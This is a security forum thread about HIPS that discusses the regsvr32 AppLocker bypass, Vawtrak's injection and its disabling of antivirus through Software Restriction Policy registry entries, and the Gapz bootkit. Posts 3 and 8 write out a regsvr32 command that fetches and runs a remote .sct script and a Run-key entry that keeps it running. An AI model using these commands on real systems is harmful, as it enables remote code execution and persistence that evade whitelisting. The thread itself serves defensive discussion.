Classical HIPS and policy based HIPS discussion

Discussion in 'other anti-malware software' started by BoerenkoolMetWorst, Jan 28, 2015.

Thread Status:
Not open for further replies.
  1. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    4,792
    Location:
    .
    Yeah. I posted about it yesterday...
     
  2. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,063
    Location:
    Canada
    How does the Applocker bypass make it on to the target machine in the first place?
     
  3. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    He is using regsvc32.exe to connect to a server and download the script remotely. Once downloaded, the script executes automatically.

    All that is needed on the local machine is anything to run regsvc32.exe which is a trusted and necessary system process used to register Win and app services.

    So, all you need to do is host your .sct file at a location you control. From the target, simply execute

    regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
    Its not well documented that regsvr32.exe can accept a url for a script.

    In order to trigger this bypass, place the code block, either VB or JS inside the <registration> element.


    Ref.: http://subt0x10.blogspot.mx/2016/04/bypass-application-whitelisting-script.html

    .sct files are downloaded and executed from a path like this -->

    14 <!-- Though, the name and extension are arbitary.. -->
    15 <!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
    16 <!-- Based on current research, no registry keys are written, since call "uninstall"


    Ref: https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302
    Since no registry keys are being modified, this one will get by most HIPS's that only monitor for changes to service keys.

    Bottom line folks, best way to infect Windows is using Windows processes!


     
    Last edited: Apr 23, 2016
  4. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,063
    Location:
    Canada

    Okay but this begs the question from me: "how does one with malicious intent make this happen on a victim's machine?" Is it possibly a malicious script or frame embedded in an ad, maybe?

     
  5. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    Anyway a dropper can end up on a user's PC; e-mail, drive-by download, etc.. The dropper could be wrapped in a script, or anything that can execute upon access.

    Primary purpose of this bypass is to show it can evade conventional whitelist detection mechanisms once run. I would say your best protection against this particular bypass is outbound firewall protection. Whatever runs regsvr32.exe on the local machine will result in an outbound connection to the rouge server. As long as the "whatever" is not a defined allowed outbound connection process, you should receive a firewall alert.
     
  6. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    20,590
    Easy for ERP users. I always get an alert on Regsvr, and if I don't know why it's there, just click block. End of story
     
  7. wat0114

    wat0114 Registered Member

    Joined:
    Aug 5, 2012
    Posts:
    4,063
    Location:
    Canada
    Okay that makes sense. Thanks.

    That would certainly work, and also ad blocking or script control to prevent a drive-by. It seems, though I could be wrong, a .sct is opened via Adobe product, so maybe some control there as well.
     
  8. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    FYI. A way to run regsvc32.exe undetected in reference to the latest Applocker bypass.

    The following assumes that you're not using a HIPS and have not created rules to protect your registry run keys.

    Create the following run registry key:

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run {random filename} = regsvr32.exe /s /n /u /i:http://server/file.sct scrobj.dll
    -EDIT-

    Also take a close look at the bandit.ps1 Powershell script from here: https://gist.github.com/subTee/24c7d8e1ff0f5602092f58cbb3f7d302 . This is how he can run commands on the client PC and download files from the remote server.

    1. It creates a local host proxy server i.e. 127.0.0.1 using HTTP port.
    2. It creates a Win Firewall inbound rule for port 80 for the proxy server.

    Assumption is a user running Win firewall in default mode i.e. all outbound traffic allowed.

     
    Last edited: Apr 24, 2016
  9. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    17,546
    Location:
    The Netherlands
    Actually, I don't believe any of these methods are related to RMI. Don't forget that RMI is just one of the code injection methods. Most HIPS can easily block the standard methods, but they don't always cover the more advanced ones. Also, in the presentation they mention a couple of kernel-mode code injection methods, and HIPS can't block them if the malicious driver is already loaded, as discussed before.
     
  10. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    It is safe to say that if any malware is running in kernel space, it is pretty much "game over." The purpose of a HIPS is to configure rules to prevent the kernel mode malware from installing itself.
     
  11. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    17,546
    Location:
    The Netherlands
  12. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    Would not be surprised if this ver. WIN32/Gapz that pioneered VBR modification:

    Win32/Gapz uses many exploitation techniques for implementing local privilege escalation (LPE) and infecting the VBR (Volume Boot Record) and MBR (Master Boot Record) in the earliest samples seen. The first interesting finding is that the VBR infection method is really new and not something we’ve seen before in other bootkit families

    Was used as a prototype for the Petya ransomware. "Old malware never dies, it just gets recycled."
     
  13. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    @Rasheed187

    Here is an especially nasty banking Trojan/backdoor that used Windows features against itself. In this case, it used SRP to disable close to 60 security products including Sandboxie. Note also that interception activity such as keylogging and the like was done remotely via the backdoor.
    Ref.: http://www.trendmicro.com/vinfo/us/threat-ecyclopedia/malware/bkdr_vawtrak.a

    More detail below. Note how this puppy is designed to avoid classical HIPS API detection:

    The payload is Vawtrak also known as Neverquest, a backdoor and a dangerous banking Trojan able to spread itself via social media, email and file transfer protocols. Vawtrak is able to recognize hundreds of financial institutions and contains a function that monitors certain keywords, allowing the cyber criminals to expand the list of targeted banks.

    Upon execution INVOICE-186591275-481264.SCR will attempt to inject itself into EXPLORER.EXE and several other running processes. Vawtrak might use the Shell_TrayWnd injection method to bypass HIPS detection.

    0. 0x304448c (13): Shell_TrayWnd
    1. 0x2e9c187 (14): GetWindowLongA
    2. 0x3044f94 (14): SetWindowLongA

    Its essence is to inject a shellcode into the Explorer process that loads and executes the malicious image. Here is the number of steps required to achieve this outcome:

    1.Open one of the shared sections from BaseNamedObjects mapped into explorer.exe address space, and write shellcode into this section

    2.After the first step shellcode is already written to explorer.exe address space and the next step is for the dropper to search for the window “Shell_TrayWnd”

    3.The dropper calls the WinAPI function GetWindowLong() so as to get the address of the routine related to the "Shell_TrayWnd" window handler

    4.At the next step the dropper calls WinAPI function SetWindowLong() to modify “Shell_TrayWnd” window-related data

    5.It calls SendNotifyMessage() to trigger shellcode execution in explorer.exe address space.


    Ref.: http://stopmalvertising.com/malware-reports/analysis-of-vawtrak.html
     
  14. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    6,144
    Location:
    Nicaragua
    Itman, according to the article, quote: "It checks for the presence of the following security-related directories", the malware checks for the presence of Sandboxie (as it does with the other security programs that are listed) but checking and disabling is not the same. Most malware can tell when they are running under SBIE as SBIE doesn't hide itself. To disable SBIE, the malware has to get out of the sandbox and that it can not do. And don't forget, Sandboxie is not an anti keylogger. So, we need to take extra precautions when doing banking if we are going to rely on Sandboxie. Read below, "Defending against Key logger". :)
    http://www.sandboxie.com/index.php?DetectingKeyLoggers#defend

    Bo
     
  15. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,592
    Location:
    U.S.A.
    FYI. From the stopmalvertising.com article. It disables as follows:

    If Vawtrak finds any of the blacklisted software, it will add a registry entry under the key below that forces the application to run with restricted privileges.

    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths
    The key / value is built as follows:

    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\Paths\{generated GUID for the AV software}
    "ItemData" = {AV software path}
    "SaferFlags" = 0

    Below you can see that Vawtrak restricts the Symantec Firewall from running.

    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{0D465F19-6ADC-468D-AE7E-7DD151DD1955} "ItemData"
    Type: REG_SZ
    Data: C:\Documents and Settings\All Users\Application Data\Symantec
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{0D465F19-6ADC-468D-AE7E-7DD151DD1955} "SaferFlags"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{5B0864CB-555E-4ABF-833C-461756022477} "ItemData"
    Type: REG_SZ
    Data: C:\Program Files\Common Files\Symantec Shared
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{5B0864CB-555E-4ABF-833C-461756022477} "SaferFlags"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{72C24562-7B4E-44D1-8862-37956DB94BBF} "ItemData"
    Type: REG_SZ
    Data: C:\Program Files\Symantec
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{72C24562-7B4E-44D1-8862-37956DB94BBF} "SaferFlags"
    Type: REG_DWORD
    Data: 00, 00, 00, 00
     
  16. bo elam

    bo elam Registered Member

    Joined:
    Jun 15, 2010
    Posts:
    6,144
    Location:
    Nicaragua
    Perhaps you dont know, but Sandboxie also protects the registry.
    http://www.sandboxie.com/index.php?SandboxHierarchy#keys

    Besides that, two points, one, Sandboxie is not Symantec Firewall, and two, if sandboxed programs disable or terminate the Sandboxie helper programs that run within the sandbox, that's all it happens. If you install SBIE just for testing, and you terminate the SBIE processes that run in the sandbox, the sandboxed program still runs under Sandboxies protection. You can test and see. And if you terminate the sandboxed program, the sandbox gets deleted.

    Bo
     
  17. JRViejo

    JRViejo Super Moderator

    Joined:
    Jul 9, 2008
    Posts:
    97,410
    Location:
    U.S.A.
    Because we have privately asked members not to take this thread Off Topic, and for whatever reason, it continues to go astray, we are closing this thread. There are other available product threads where specific software issues & comments can be posted.

    Thank you all for participating!
     
Thread Status:
Not open for further replies.
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.